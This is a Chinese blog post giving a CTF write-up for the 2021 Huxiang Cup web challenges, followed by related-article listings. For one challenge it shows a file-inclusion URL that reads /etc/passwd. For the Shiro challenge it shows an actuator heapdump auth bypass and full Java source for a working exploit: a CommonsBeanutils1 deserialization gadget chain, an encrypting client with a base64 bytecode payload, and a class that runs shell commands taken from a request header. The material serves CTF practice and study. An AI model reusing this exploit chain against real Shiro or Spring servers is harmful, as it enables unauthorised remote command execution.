2021湖湘杯web部分wp

最新推荐文章于 2024-09-10 11:44:38 发布
最新推荐文章于 2024-09-10 11:44:38 发布
阅读量1.9k 收藏 5
点赞数 3
分类专栏: ctfwp 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fmyyy1/article/details/121322215
版权

前言

快期末了这学期准备退役了,下学期继续努力(大二课怎么这么多啊!!!期末考怎么办啊!!!一节课没听啊!!!)
今天上线看看题

easywill

这题没啥好说,跟tp3的rce差不多
直接

?name=cfile&value=/etc/passwd

就能文件包含,之后找不到flag,用拟态的的那个包含pearcmd.php就能getshell

Pentest in Autumn

下个pom.xml附件 看到shiro

<?xml version="1.0" encoding="UTF-8"?>

-<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://maven.apache.org/POM/4.0.0">

<modelVersion>4.0.0</modelVersion>


-<parent>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter-parent</artifactId>

<version>2.5.4</version>

<relativePath/>

<!-- lookup parent from repository -->


</parent>

<groupId>com.demo</groupId>

<artifactId>demo</artifactId>

<version>0.0.1-SNAPSHOT</version>

<name>demo</name>

<description>Demo project for Spring Boot</description>


-<properties>

<java.version>1.8</java.version>

</properties>


-<dependencies>


-<dependency>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter</artifactId>

</dependency>


-<dependency>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter-actuator</artifactId>

<version>2.2.2.RELEASE</version>

</dependency>


-<dependency>

<groupId>org.apache.shiro</groupId>

<artifactId>shiro-core</artifactId>

<version>1.5.0</version>

</dependency>


-<dependency>

<groupId>org.apache.shiro</groupId>

<artifactId>shiro-spring</artifactId>

<version>1.5.0</version>

</dependency>

<!-- shiro ehcache -->



-<dependency>

<groupId>org.apache.shiro</groupId>

<artifactId>shiro-ehcache</artifactId>

<version>1.5.0</version>

</dependency>


-<dependency>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter-test</artifactId>

<scope>test</scope>

</dependency>


-<dependency>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter-web</artifactId>

<version>2.5.4</version>

<scope>compile</scope>

</dependency>

</dependencies>


-<build>


-<plugins>


-<plugin>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-maven-plugin</artifactId>

</plugin>

</plugins>

</build>

</project>

spring和shiro,shiro版本有点高,没法直接打。

有个actuator泄露

1636882499301.png找到这篇博客

https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html

下到heapdump就能弄到秘钥,文章里也给了处理脚本

直接访问无法下载,用shiro未授权

/;/actuator/heapdump

成功下载

用文章里的工具找到秘钥,并脚本处理

import base64
import struct

print(base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb',-42,28,62,68,-37,-114,31,-124,114,-99,77,16,-61,63,-83,78)))

拿到key就好办了,之后就是cb1的shiro链子配合spring的通用回显即可

package shiroatack;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

public class CCShiro {
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public byte[] getPayload(byte[] code) throws Exception {
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");

        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();

        return barr.toByteArray();
    }
}

Client.java

package shiroatack;

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

//public class Client {
//    public static void main(String []args) throws Exception {
//        ClassPool pool = ClassPool.getDefault();
//        CtClass clazz = pool.get(shiroatack.Evil.class.getName());
//        byte[] payloads = new CCShiro().getPayload(clazz.toBytecode());
//
//        AesCipherService aes = new AesCipherService();
//        byte[] key = java.util.Base64.getDecoder().decode("kHLjXF0g5vdRE0X+oO6Uqg==");
//
//        ByteSource ciphertext = aes.encrypt(payloads, key);
//        System.out.printf(ciphertext.toString());
//    }
//}
import javassist.ClassPool;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;
import java.util.Base64;

public class Client {
    public static void main(String[] args) throws Exception{
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAuQoALwBfCgBgAGEKAGAAYggAYwoAZABlCABmBwBnCgAHAGgHAGkKAGoAawgAbAgAbQgAbggAbwgATQoABwBwCABxCABOBwByCgBqAHMIAFAIAHQKAHUAdgoAEwB3CAB4CgATAHkIAHoIAHsKABMAfAgAfQgAfggAfwgAgAoACQCBCACCBwCDCgCEAIUKAIQAhgoAhwCICgAkAIkIAIoKACQAiwoAJACMCACNCACOBwCPBwCQAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABFMcm9tZS9TcHJpbmdFdmlsOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwCRAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYBAAFjAQARTGphdmEvbGFuZy9DbGFzczsBAAFtAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAFvAQASTGphdmEvbGFuZy9PYmplY3Q7AQACbTEBAARyZXNwAQADcmVxAQAJZ2V0V3JpdGVyAQAJZ2V0SGVhZGVyAQAGd3JpdGVyAQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQAIY29tbWFuZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQALY2hhcnNldE5hbWUBAA1TdGFja01hcFRhYmxlBwCPBwBnBwCSBwBpBwByBwBTBwCTAQAKU291cmNlRmlsZQEAD1NwcmluZ0V2aWwuamF2YQwAQgBDBwCUDACVAJYMAJcAmAEAPG9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQucmVxdWVzdC5SZXF1ZXN0Q29udGV4dEhvbGRlcgcAmQwAmgCbAQAUZ2V0UmVxdWVzdEF0dHJpYnV0ZXMBAA9qYXZhL2xhbmcvQ2xhc3MMAJwAnQEAEGphdmEvbGFuZy9PYmplY3QHAJIMAJ4AnwEAQG9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQucmVxdWVzdC5TZXJ2bGV0UmVxdWVzdEF0dHJpYnV0ZXMBAAtnZXRSZXNwb25zZQEACmdldFJlcXVlc3QBAB1qYXZheC5zZXJ2bGV0LlNlcnZsZXRSZXNwb25zZQwAoACdAQAlamF2YXguc2VydmxldC5odHRwLkh0dHBTZXJ2bGV0UmVxdWVzdAEAEGphdmEvbGFuZy9TdHJpbmcMAKEAogEAB29zLm5hbWUHAKMMAKQApQwApgCnAQAGd2luZG93DACoAKkBAANHQksBAAVVVEYtOAwAqgCnAQADV0lOAQACL2MBAAcvYmluL3NoAQACLWMMAKsArAEAB3ByaW50bG4BABFqYXZhL3V0aWwvU2Nhbm5lcgcArQwArgCvDACwALEHALIMALMAtAwAQgC1AQACXEEMALYAtwwAuACnAQAFZmx1c2gBAAVjbG9zZQEAD3JvbWUvU3ByaW5nRXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldERlY2xhcmVkTWV0aG9kAQANc2V0QWNjZXNzaWJsZQEABChaKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAC3RvVXBwZXJDYXNlAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBACooTGphdmEvaW8vSW5wdXRTdHJlYW07TGphdmEvbGFuZy9TdHJpbmc7KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0ACEALgAvAAAAAAADAAEAMAAxAAIAMgAAAD8AAAADAAAAAbEAAAACADMAAAAGAAEAAAAWADQAAAAgAAMAAAABADUANgAAAAAAAQA3ADgAAQAAAAEAOQA6AAIAOwAAAAQAAQA8AAEAMAA9AAIAMgAAAEkAAAAEAAAAAbEAAAACADMAAAAGAAEAAAAbADQAAAAqAAQAAAABADUANgAAAAAAAQA3ADgAAQAAAAEAPgA/AAIAAAABAEAAQQADADsAAAAEAAEAPAABAEIAQwACADIAAALDAAkADQAAAXsqtwABuAACtgADEgS2AAVMKxIGA70AB7YACE0sAQO9AAm2AApOuAACtgADEgu2AAVMKxIMA70AB7YACE0rEg0DvQAHtgAIOgQsLQO9AAm2AAo6BRkELQO9AAm2AAo6BrgAArYAAxIOtgAFEg8DvQAHtgAQOge4AAK2AAMSEbYABRISBL0AB1kDEhNTtgAQOggZCAS2ABQZBwS2ABQZBxkFA70ACbYACjoJGQgZBgS9AAlZAxIVU7YACsAAEzoKBr0AEzoLEha4ABe2ABgSGbYAGpkACBIbpwAFEhw6DBIWuAAXtgAdEh62ABqZABIZCwMSFVMZCwQSH1OnAA8ZCwMSIFMZCwQSIVMZCwUZClMZCbYAIhIjBL0AB1kDEhNTtgAQGQkEvQAJWQO7ACRZuAAlGQu2ACa2ACcZDLcAKBIptgAqtgArU7YAClcZCbYAIhIsA70AB7YAEBkJA70ACbYAClcZCbYAIhItA70AB7YAEBkJA70ACbYAClexAAAAAwAzAAAAbgAbAAAAHAAEAB0AEAAeABsAHwAlACAAMQAhADwAIgBIACMAUwAkAF8AJQB1ACYAkAAnAJYAKACcACkAqQAqAL4AKwDEACwA3QAtAO0ALgDzAC8A/AAxAQIAMgEIADQBDgA1AUoANgFiADcBegA4ADQAAACEAA0AAAF7ADUANgAAABABawBEAEUAAQAbAWAARgBHAAIAJQFWAEgASQADAEgBMwBKAEcABABTASgASwBJAAUAXwEcAEwASQAGAHUBBgBNAEcABwCQAOsATgBHAAgAqQDSAE8ASQAJAL4AvQBQAFEACgDEALcAUgBTAAsA3QCeAFQAUQAMAFUAAAA4AAT/ANkADAcAVgcAVwcAWAcAWQcAWAcAWQcAWQcAWAcAWAcAWQcAWgcAWwAAQQcAWvwAIAcAWgsAOwAAAAQAAQBcAAEAXQAAAAIAXg==");
        byte[] payloads = new CCShiro().getPayload(code);
        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.getDecoder().decode("vpDnFv8IV/zz5V+uAjg2kQ==");//这里替换密钥
        ByteSource ciphertext = aes.encrypt(payloads,key);
        System.out.println(ciphertext.toString());
    }
}

获得字节码的类:(spring通用回显)

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.net.InetAddress;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.*;
import java.lang.reflect.Method;
import java.util.Scanner;

public class SpringEvil extends AbstractTranslet
{
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    public SpringEvil() throws Exception{
        Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
        Method m = c.getMethod("getRequestAttributes");
        Object o = m.invoke(null);
        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
        m = c.getMethod("getResponse");
        Method m1 = c.getMethod("getRequest");
        Object resp = m.invoke(o);
        Object req = m1.invoke(o); // HttpServletRequest
        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
        getHeader.setAccessible(true);
        getWriter.setAccessible(true);
        Object writer = getWriter.invoke(resp);
        String cmd = (String)getHeader.invoke(req, "cmd");
        String[] commands = new String[3];
        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
            commands[0] = "cmd";
            commands[1] = "/c";
        } else {
            commands[0] = "/bin/sh";
            commands[1] = "-c";
        }
        commands[2] = cmd;
        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
        writer.getClass().getDeclaredMethod("flush").invoke(writer);
        writer.getClass().getDeclaredMethod("close").invoke(writer);
    }
}

运行client.java payload如下图打shiro

1636883274651.png
这个通用回显真好用,这几次比赛全是spring,都能直接回显

湖湘 | Misc Wp
Lemon's blog
11-09 2490
前言 全程卡死在验证码处,体验感爆棚 MISC
一、WillPHPv2代码审计-[变量覆盖]-[文件包含]-[任意文件读取漏洞]-[pearcmd裸文件包含]
qwsn
12-12 3485
时间戳——2021.12.12 0x01 WP: 第一步:拉去本地代码审计(框架调试) 第二步:调试过程 第三步:在buuctf开启的的环境里获取flag 附:怎么配置phpstorm+phpstudy+xdebug远程调试 注意:配置一个假的远程调试,我们就把源码放到本机(也就是127.0.0.1)的网站根目录WWW下的exp/willphpv2目录下 第一步:访问https://xdebug.org/wizard,把phpinfo的内容贴进去,会返回我们可以使用的对应版本的xdebug 第二
2021深育-网络安全大赛专业竞赛部分wp
七堇年的博客
12-23 2681
2021深育-网络安全大赛专业竞赛
2021年深育Web
feng的博客
11-14 2243
WebLog 访问发现是个文件下载,下载的是日志文件,目录穿越不太好传,尝试拿bp爆破一下日期来下载Log,发现了一个jar: 访问?logname=cb-0.0.1-SNAPSHOT.jar把jar包下载下来,发现存在一个反序列化的后门: @ResponseBody @RequestMapping({"/bZdWASYu4nN3obRiLpqKCeS8erTZrdxx/parseUser"}) public String getUser(String user) throws E
2021第七届湖湘-web-wp
midi
11-15 4251
第七届湖湘-web-wpWeb1 easywillWeb2 Pentest in Autumn Web1 easywill 题目给的附件Pom.xml Pom.xml 中有actuator http://eci-2zedwevdyx4t10vmh85o.cloudeci1.ichunqiu.com:8888/actuator Springboot中actuator常见接口(1.x能够直接访问,2.x是在actuator目录下) 由于没有权限,接下来访问都是302 http://eci-2zedwevdy
2018.11.18湖湘wp
uiop_uiop_uiop的博客
11-19 1567
1、签到 关注公众号,略。 2、HighwayHash64 根据题目名称以及里面的口算hash,结合着题目反汇编了解到这是一个hash算法,搜索得到哈希的源代码。 拖进ida里面,分析程序逻辑发现程序首先对输入的flag长度进行了一次hash验证需要等于一个16位hash,之后又对花括号当中的数字进行了hash验证,不成功就return 1。既然是一个hash算法,应该只有爆破了吧。先把长...
CTF Web部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
BugkuCTF-WEB-第43题到第52题
Alita_lxz的博客
11-04 1322
BugkuCTF-WEB-第43题到第52题
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6174
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
中文汉字码表
weixin_38871988的博客
09-08 6万+
[PAD] [unused1] [unused2] [unused3] [unused4] [unused5] [unused6] [unused7] [unused8] [unused9] [unused10] [unused11] [unused12] [unused13] [unused14] [unused15] [unused16] [unused17] [unused18] [unused19] [unused20] [unused21] [unused22] [unused23] [unuse
深育 2021 高校组 CTF 网络安全大赛 专业竞赛 真题 zip
12-07
深育 2021 高校组 CTF 网络安全大赛 专业竞赛 真题
2020湖湘 wp
weixin_46330722的博客
11-02 2027
2020湖湘 wpweb题目名字不重要反正题挺简单的NewWebsite 今天打了下湖湘,签到选手上线。 web 题目名字不重要反正题挺简单的 题目源码 <?php error_reporting(0); //I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker. if ( isset($_GET['file']) ) { $file = $_GET
湖湘2020 easyre wp
苗_的博客
11-10 510
很久没有写题解博客了,最近忙着学习深度学习= =,湖湘这道题还是不错的,可以锻炼一下自己动态调试的能力,所以刚好在练习的过程中记录一下,方便以后回顾: 首先拿到文件,查壳发现无壳,运行一下大概就是先判断长度,再判断是否是正确flag: 长度错误就输出wrong length并退出。 拿到ida里看一下,发现没有很明显的入口函数,查找字符串找到input your flag:,找到主函数位置 f5看一下,发现没办法反编译,所以我们就直接上动态调试吧: 在0x40DA40下断点(f2),f8单步
2021年11月深育REVERSE的press
沐一 · 林 的博客
11-19 391
2021年11月深育REVERSE的press 下载附件,是两个文件: . 猜想是题目类型是与本地文件相关的操作类型,照例扔入exeinfope中查看信息: . 然后两个文件可以简单猜想一下press程序应该是输出了一些信息到out文件中,在linux下照例运行一下press程序看一下回显: . . 那么这个程序没有输入,根据经验这种类型的题目通常直接利用程序外部的一些东西来作为条件继续执行的,如本地环境,文件读取等。所以照例扔入IDA查看伪代码,有main函数看main函数: . . 知道大
“深育”大学生网络安全大赛重磅启动
sangfor_edu的博客
08-22 460
2019年山东省深思网络安全大赛
明月于心的博客
11-04 2282
刚参加完比赛,总结一波。 第一题:签到题 下载完成之后发现是个.exe文件 杂项万年套路步骤,用winhex打开,搜索flag,找到,提交。。。 第二题:qiu咪 发现是一张flag.png。。万年套路 用winhex打开。啥也没发现,然后放在kali里边 binwalk一下,也没发现有隐藏信息。。 用了隐写图片神器(stegsolve.jar)发现在red plan 0、blue plan 0...
2021深育线上初赛官方WriteUp
further_eye的博客
11-18 1万+
Web EasySQL 访问robots.txt,可得三个文件index.php、config.php、helpyou2findflag.php。 fuzz黑名单,可发现select、单双引号、括号、分号、set、show、variables、等都没有过滤。 经测试可得到闭合方式为括号,且白名单为数据库记录行数,使用1);{sqlinject}-- +可以闭合查询语句并进行堆叠注入。 show variables like '%slow_query_log%'; # 查询慢日志记录是否开启 setgloba
2024年9月网络安全行业活动、赛事一览
最新发布
2302_76672693的博客
09-10 1376
2024年9月网络安全行业活动、赛事一览
2021湖湘easy&&深育WEBLog
Love&Share
11-14 1389
文章目录湖湘easy深育WEBLog 湖湘easy <?php namespace home\controller; class IndexController{ public function index(){ highlight_file(__FILE__); assign($_GET['name'],$_GET['value']); return view(); } } 题目页面最下边有powered by willphp.
2021陇剑线下赛 wp
09-02
2021陇剑线下赛wp指的是该比赛的胜利方案(Winning Proposal)。这个问题的答案取决于具体的比赛和题目,因此我无法提供具体的场景和情况。不过,我可以向你介绍一些常见的比赛wp示例,帮助你理解wp的含义。 通常...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值